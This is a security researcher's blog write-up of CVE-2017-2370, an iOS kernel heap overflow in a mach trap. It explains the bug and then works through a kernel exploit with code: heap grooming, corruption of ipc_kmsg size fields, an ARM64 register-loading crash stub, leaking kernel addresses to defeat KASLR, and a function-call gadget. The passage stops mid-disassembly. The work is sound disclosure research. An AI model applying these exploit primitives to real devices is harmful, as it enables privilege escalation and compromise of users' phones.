Posted by Ian Beer

This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing, and how to build live kernel introspection features using old kernel exploits.

It’s a trap!

Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:

/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),

/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),

/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),

Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel APIs. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.

Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code, complex mach traps often have to do lots of manual argument parsing which is tricky to get right.

In iOS 10 a new entry appeared in the mach_traps table:

/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),

The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:

struct mach_voucher_extract_attr_recipe_args {

PAD_ARG_(mach_port_name_t, voucher_name);

PAD_ARG_(mach_voucher_attr_key_t, key);

PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);

PAD_ARG_(user_addr_t, recipe_size);

};

A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.

Let’s walk through the trap code:

kern_return_t

mach_voucher_extract_attr_recipe_trap(

struct mach_voucher_extract_attr_recipe_args *args)

{

ipc_voucher_t voucher = IV_NULL;

kern_return_t kr = KERN_SUCCESS;

mach_msg_type_number_t sz = 0;

if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))

return KERN_MEMORY_ERROR;

copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.

if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)

return MIG_ARRAY_TOO_LARGE;

mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.

voucher = convert_port_name_to_voucher(args->voucher_name);

if (voucher == IV_NULL)

return MACH_SEND_INVALID_DEST;

convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.

if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {

/* keep small recipes on the stack for speed */

uint8_t krecipe[sz];

if (copyin(args->recipe, (void *)krecipe, sz)) {

kr = KERN_MEMORY_ERROR;

goto done;

}

kr = mach_voucher_extract_attr_recipe(voucher,

args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);

if (kr == KERN_SUCCESS && sz > 0)

kr = copyout(krecipe, (void *)args->recipe, sz);

}

If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:

else {

uint8_t *krecipe = kalloc((vm_size_t)sz);

if (!krecipe) {

kr = KERN_RESOURCE_SHORTAGE;

goto done;

}

if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {

kfree(krecipe, (vm_size_t)sz);

kr = KERN_MEMORY_ERROR;

goto done;

}

The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.
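The gap between the two lengths in that snippet can be modelled with a minimal user-space sketch. This is not kernel code: `fake_args`, `alloc_len`, `copy_len` and `overflow_len` are hypothetical names introduced only for illustration, and the sketch assumes the whole source range is mapped so that the copy would not stop early.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-in for the trap arguments. Note that recipe_size
 * holds a userspace ADDRESS at which the size is stored, not the size. */
struct fake_args {
    uint64_t recipe;       /* userspace address of the recipe bytes   */
    uint64_t recipe_size;  /* userspace address of a 32-bit size value */
};

/* Length used for the heap allocation: the 32-bit value that was
 * read through the recipe_size pointer (sz in the trap code). */
static uint64_t alloc_len(uint32_t sz) {
    return sz;
}

/* Length handed to the copy in the large path: the pointer value itself. */
static uint64_t copy_len(const struct fake_args *args) {
    assert(args != 0);
    return args->recipe_size;
}

/* Number of bytes the copy would try to write past the allocation. */
static uint64_t overflow_len(const struct fake_args *args, uint32_t sz) {
    uint64_t want = copy_len(args);
    uint64_t have = alloc_len(sz);
    return want > have ? want - have : 0;
}
```

With an illustrative `recipe_size` address of 0x100000 and an `sz` of 0x900, the copy length exceeds the allocation by 0x100000 - 0x900 bytes.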

If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!

To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.

a recipe for copypasta

Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.

These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.

It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.

This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)

Here’s the relevant code from the two functions; the first snippet is fine and the second has the bug:

host_create_mach_voucher_trap:

if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {

kfree(krecipes, (vm_size_t)args->recipes_size);

kr = KERN_MEMORY_ERROR;

goto done;

}

mach_voucher_extract_attr_recipe_trap:

if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {

kfree(krecipe, (vm_size_t)sz);

kr = KERN_MEMORY_ERROR;

goto done;

}

My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:

error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?

if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {

^

recipe_size

Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.

Building primitives



copyin on iOS will fail if the size argument is greater than 0x4000000. Since recipe_size also needs to be a valid userspace pointer this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches the unmapped source page and stop.
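The page-boundary trick can be sketched in portable POSIX C. This is a minimal illustration under stated assumptions, not the exploit's code: `place_before_unmapped_page` is a hypothetical helper, and the sketch does not attempt the low-address mapping that the pagezero_size option makes possible.

```c
#define _DEFAULT_SOURCE /* assumption: exposes MAP_ANON on glibc in strict modes */
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Copies len bytes of data so that they end exactly at a page boundary,
 * with the page that follows unmapped. A reader walking forward from the
 * returned pointer faults after exactly len bytes.
 * Returns NULL on failure. */
static uint8_t *place_before_unmapped_page(const void *data, size_t len) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    assert(data != NULL);
    if (len == 0 || len > page) {
        return NULL;
    }

    /* Reserve two adjacent pages so the second one is known to be ours. */
    uint8_t *base = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANON, -1, 0);
    if (base == MAP_FAILED) {
        return NULL;
    }

    /* Drop the second page, leaving a hole right after the first. */
    if (munmap(base + page, page) != 0) {
        munmap(base, page);
        return NULL;
    }

    /* Align the data right up to the end of the remaining page. */
    uint8_t *dst = base + page - len;
    memcpy(dst, data, len);
    return dst;
}
```

The returned pointer plays the role of args->recipe: the number of bytes before the hole is what bounds the copy, independent of the length argument passed to it.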

If the copyin fails the kalloced buffer will be immediately freed.

Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.

When I’m working on a new exploit I spend a lot of time looking for new primitives; for example objects allocated on the heap which, if I could overflow into them, would let me cause a chain of interesting things to happen. Generally interesting means that if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.

To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.

For anyone who has ever written a browser exploit this will be a familiar construct!

ipc_kmsg

Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:

struct ipc_kmsg {

mach_msg_size_t ikm_size;

struct ipc_kmsg *ikm_next;

struct ipc_kmsg *ikm_prev;

mach_msg_header_t *ikm_header;

ipc_port_t ikm_prealloc;

ipc_port_t ikm_voucher;

mach_msg_priority_t ikm_qos;

mach_msg_priority_t ikm_qos_override;

struct ipc_importance_elem *ikm_importance;

queue_chain_t ikm_inheritance;

};

This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?

Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:

void ipc_kmsg_free(ipc_kmsg_t kmsg);

This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.

This macro is used to set the ikm_size field:

#define ikm_init(kmsg, size) \

MACRO_BEGIN \

(kmsg)->ikm_size = (size); \

This macro uses the ikm_size field to set the ikm_header pointer:

#define ikm_set_header(kmsg, mtsize) \

MACRO_BEGIN \

(kmsg)->ikm_header = (mach_msg_header_t *) \

((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \

MACRO_END

That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.
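The pointer arithmetic in ikm_set_header can be restated as plain offset arithmetic. The following is a small sketch: `header_offset` and `bytes_out_of_bounds` are hypothetical helper names, the structure size is passed in rather than assumed, and the allocation is assumed to be exactly the structure followed by the real ikm_size bytes.

```c
#include <assert.h>
#include <stdint.h>

/* Offset of ikm_header from the start of the allocation, mirroring
 * (kmsg + 1) + ikm_size - mtsize. kmsg_struct_size stands in for
 * sizeof(struct ipc_kmsg). */
static uint64_t header_offset(uint64_t kmsg_struct_size,
                              uint64_t ikm_size,
                              uint64_t mtsize) {
    assert(mtsize <= ikm_size);
    return kmsg_struct_size + ikm_size - mtsize;
}

/* How many bytes of an mtsize-byte message fall past the end of the
 * allocation when the stored ikm_size (fake) is larger than the size
 * the buffer was really allocated with (real). */
static uint64_t bytes_out_of_bounds(uint64_t real_ikm_size,
                                    uint64_t fake_ikm_size,
                                    uint64_t mtsize) {
    uint64_t excess = fake_ikm_size > real_ikm_size
                          ? fake_ikm_size - real_ikm_size
                          : 0;
    return excess < mtsize ? excess : mtsize;
}
```

Because the message is aligned to the end of the buffer the kernel believes it has, inflating ikm_size by N bytes moves the end of the message N bytes past the real allocation.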

Finally there’s a check in ipc_kmsg_get_from_kernel:

if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {

ip_unlock(dest_port);

return MACH_SEND_TOO_LARGE;

}

That’s using the ikm_size field to ensure that there’s enough space in the ipc_kmsg buffer for a message.

It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is, which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.

It’s about sending a message

ipc_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ipc_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.

Larger messages bypass this cache and are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:

kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));

...

if (kmsg != IKM_NULL) {

ikm_init(kmsg, max_expanded_size);

ikm_set_header(kmsg, msg_and_trailer_size);

}

return(kmsg);

Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.

But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.

This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG APIs for example. The function’s comment explains more:

* Routine: ipc_kmsg_get_from_kernel

* Purpose:

* First checks for a preallocated message

* reserved for kernel clients. If not found -

* allocates a new kernel message buffer.

* Copies a kernel message to the message buffer.

Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ipc_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):

if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {

mach_msg_size_t max_desc = 0;

kmsg = dest_port->ip_premsg;

if (ikm_prealloc_inuse(kmsg)) {

ip_unlock(dest_port);

return MACH_SEND_NO_BUFFER;

}

if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {

ip_unlock(dest_port);

return MACH_SEND_TOO_LARGE;

}

ikm_prealloc_set_inuse(kmsg, dest_port);

ikm_set_header(kmsg, msg_and_trailer_size);

ip_unlock(dest_port);

...

(void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);

This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro which sets ikm_header such that the message will align to the end of the buffer and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocated message buffer.

ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.

This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.

Exceptional behaviour

There’s one difficulty with preallocated messages: because they’re only used when the kernel sends a message to us we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, which is much harder!

There are only a handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contain a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.

When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to the global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.

routine thread_set_exception_ports(

thread : thread_act_t;

exception_mask : exception_mask_t;

new_port : mach_port_t;

behavior : exception_behavior_t;

new_flavor : thread_state_flavor_t);

This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behavior defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.

Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purpose registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!

Some assembly required...

In our iOS XCode project we can add a new assembly file and define a function load_regs_and_crash:

.text

.globl _load_regs_and_crash

.align 2

_load_regs_and_crash:

mov x30, x0

ldp x0, x1, [x30, 0]

ldp x2, x3, [x30, 0x10]

ldp x4, x5, [x30, 0x20]

ldp x6, x7, [x30, 0x30]

ldp x8, x9, [x30, 0x40]

ldp x10, x11, [x30, 0x50]

ldp x12, x13, [x30, 0x60]

ldp x14, x15, [x30, 0x70]

ldp x16, x17, [x30, 0x80]

ldp x18, x19, [x30, 0x90]

ldp x20, x21, [x30, 0xa0]

ldp x22, x23, [x30, 0xb0]

ldp x24, x25, [x30, 0xc0]

ldp x26, x27, [x30, 0xd0]

ldp x28, x29, [x30, 0xe0]

brk 0

.align 3

This function takes a pointer to a 240 byte buffer as the first argument then assigns each of the first 30 ARM64 general-purpose registers values from that buffer such that when it triggers a software interrupt via brk 0 and the kernel sends an exception message that message contains the bytes from the input buffer in the same order.

We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.

I’m going to build my own kernel debugger (with printfs and hexdumps)

A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.

There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access! In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write and as part of that I wrote a handful of kernel introspection functions which allowed you to find process task structures and look up mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.

The first version of this new exploit was developed inside the mach_portal xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.

Inside mach_portal I was able to find the address of a preallocated port buffer like this:

// allocate an ipc_kmsg:

kern_return_t err;

mach_port_qos_t qos = {0};

qos.prealloc = 1;

qos.len = size;

mach_port_name_t name = MACH_PORT_NULL;

err = mach_port_allocate_full(mach_task_self(),

MACH_PORT_RIGHT_RECEIVE,

MACH_PORT_NULL,

&qos,

&name);

uint64_t port = get_port(name);

uint64_t prealloc_buf = rk64(port+0x88);

printf("0x%016llx,\n", prealloc_buf);

get_port was part of the mach_portal exploit and is defined like this:

uint64_t get_port(mach_port_name_t port_name){

return proc_port_name_to_port_ptr(our_proc, port_name);

}

uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {

uint64_t ports = get_proc_ipc_table(proc);

uint32_t port_index = port_name >> 8;

uint64_t port = rk64(ports + (0x18*port_index)); //ie_object

return port;

}

uint64_t get_proc_ipc_table(uint64_t proc) {

uint64_t task_t = rk64(proc + struct_proc_task_offset);

uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);

uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);

return is_table;

}

These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.

I used this method with some trial and error to determine the correct value to overwrite ikm_size with, so as to align the controlled portion of an exception message with the start of the next heap object.

get-where-what

The final piece of the puzzle is the ability to know where controlled data is; rather than write-what-where we want to get where what is.

One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.

One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks; the latest talk has details of the zone freelist randomization.



Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behaviour (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.

This means we can use code like this:

int prealloc_size = 0x900; // kalloc.4096

for (int i = 0; i < 2000; i++){

prealloc_port(prealloc_size);

}

// these will be contiguous now, convenient!

mach_port_t holder = prealloc_port(prealloc_size);

mach_port_t first_port = prealloc_port(prealloc_size);

mach_port_t second_port = prealloc_port(prealloc_size);

to get a heap layout in which the holder, first_port and second_port buffers are contiguous.

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but works perfectly well enough for a research tool.

We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:

// free the holder:

mach_port_destroy(mach_task_self(), holder);

// reallocate the holder and overflow out of it

uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};

do_overflow(0x1000, 64, overflow_bytes);

// grab the holder again

holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first_port to 0x1104.

After the ipc_kmsg structure has been filled in by ipc_kmsg_get_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:

void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,

ipc_kmsg_t kmsg)

{

ipc_kmsg_t first = queue->ikmq_base;

ipc_kmsg_t last;

if (first == IKM_NULL) {

queue->ikmq_base = kmsg;

kmsg->ikm_next = kmsg;

kmsg->ikm_prev = kmsg;

} else {

last = first->ikm_prev;

kmsg->ikm_next = first;

kmsg->ikm_prev = last;

first->ikm_prev = kmsg;

last->ikm_next = kmsg;

}

}

If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of message sends and receives will allow us to use this fact to read back the address of the second ipc_kmsg buffer:
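The self-pointer behaviour is easy to confirm with a user-space model of the same enqueue logic. This sketch uses hypothetical `struct msg` and `struct msg_queue` types that keep only the link fields; it mirrors the control flow of ipc_kmsg_enqueue but is not the kernel's code.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical reduced message: only the two link fields. */
struct msg {
    struct msg *next;
    struct msg *prev;
};

/* Hypothetical reduced queue: only the base pointer. */
struct msg_queue {
    struct msg *base;
};

/* Same shape as ipc_kmsg_enqueue: a circular doubly-linked list in
 * which a lone element links to itself in both directions. */
static void msg_enqueue(struct msg_queue *q, struct msg *m) {
    assert(q != NULL && m != NULL);
    struct msg *first = q->base;

    if (first == NULL) {
        /* Empty queue: the message becomes its own neighbour. */
        q->base = m;
        m->next = m;
        m->prev = m;
    } else {
        /* Non-empty queue: splice in just before the first element. */
        struct msg *last = first->prev;
        m->next = first;
        m->prev = last;
        first->prev = m;
        last->next = m;
    }
}
```

After the first enqueue on an empty queue, the message's own address is stored inside the message, which is what makes it recoverable through an out-of-bounds read of the neighbouring buffer.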



uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};

send_prealloc_msg(first_port, valid_header, 8);

// send a message to the second port

// writing a pointer to itself in the prealloc buffer

send_prealloc_msg(second_port, valid_header, 8);

// receive on the first port, reading the header of the second:

uint64_t* buf = receive_prealloc_msg(first_port);

// this is the address of the second port's ipc_kmsg buffer

kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:

void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {

struct thread_args* args = malloc(sizeof(struct thread_args));

memset(args, 0, sizeof(struct thread_args));

memcpy(args->buf, buf, n*8);

args->exception_port = port;

// start a new thread passing it the buffer and the exception port

pthread_t t;

pthread_create(&t, NULL, do_thread, (void*)args);

// associate the pthread_t with the port

// so that we can join the correct pthread

// when we receive the exception message and it exits:

kern_return_t err = mach_port_set_context(mach_task_self(),

port,

(mach_port_context_t)t);

// wait until the message has actually been sent:

while(!port_has_message(port)){;}

}

Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port then it starts a new thread which will call do_thread:

void* do_thread(void* arg) {

struct thread_args* args = (struct thread_args*)arg;

uint64_t buf[32];

memcpy(buf, args->buf, sizeof(buf));

kern_return_t err;

err = thread_set_exception_ports(mach_thread_self(),

EXC_MASK_ALL,

args->exception_port,

EXCEPTION_STATE,

ARM_THREAD_STATE64);

free(args);

load_regs_and_crash(buf);

return NULL;

}

do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.

At this point the kernel’s interrupt handler will call exception_deliver which will look up the thread’s exception port and call the MIG mach_exception_raise_state method which will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer.

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?

Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.

We observed earlier that if a port’s message queue is empty when a message is enqueued the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting its header with one that makes the ipc_kmsg still be valid and unused) then reading back the message sent to first_port we can determine the address of the second port’s ipc_kmsg buffer.

read/write to arbitrary read/write

We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.

For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.



Whoever developed that exploit had found that the IOKit OSSerializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.

In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.

Let’s free second_port and reallocate an IOKit userclient there:

// send another message on first

// writing a valid, safe header back over second

send_prealloc_msg(first_port, valid_header, 8);

// free second and get it reallocated as a userclient:

mach_port_deallocate(mach_task_self(), second_port);

mach_port_destroy(mach_task_self(), second_port);

mach_port_t uc = alloc_userclient();

// read back the start of the userclient buffer:

buf = receive_prealloc_msg(first_port);

// save a copy of the original object:

memcpy(legit_object, buf, sizeof(legit_object));

// this is the vtable for AGXCommandQueue

uint64_t vtable = buf[0];

alloc_userclient allocates user client type 5 of the AGXAccelerator IOService, which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes, so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.

Note that we sent another message with a valid header to first_port, which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable. Using this we can determine the KASLR slide and thus work out the address of OSSerializer::serialize.
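The slide arithmetic itself is simple and can be sketched as follows. The helper names are hypothetical, and the unslid addresses would have to come from static analysis of the specific kernelcache being targeted; no real addresses are given here.

```c
#include <stdint.h>

/* Slide = runtime value of a known pointer minus its unslid (static) value.
 * Both arguments must refer to the same pointer, e.g. the vtable pointer
 * stored in the first qword of the object. */
uint64_t kaslr_slide(uint64_t leaked_vtable, uint64_t unslid_vtable)
{
    return leaked_vtable - unslid_vtable;
}

/* Apply the slide to any other static address from the same image. */
uint64_t slide_address(uint64_t unslid_addr, uint64_t slide)
{
    return unslid_addr + slide;
}
```

With the slide in hand, the runtime address of OSSerializer::serialize is its static address plus the slide, under the assumption that the kernel and its prelinked extensions are slid together by the same amount.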

Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port, which is invoked by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference, which will call ::release().

Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument, meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:

class OSSerializer : public OSObject

{

OSDeclareDefaultStructors(OSSerializer)

void * target;

void * ref;

OSSerializerCallback callback;

virtual bool serialize(OSSerialize * serializer) const;

};

bool OSSerializer::serialize( OSSerialize * s ) const

{

return( (*callback)(target, ref, s) );

}

It’s clearer what’s going on if we look at the disassembly of OSSerializer::serialize:

; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)

MOV X8, X1

LDP X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]

LDR X9, [X0,#0x10] ; load X9 from [X0+0x10]

MOV X0, X9

MOV X2, X8

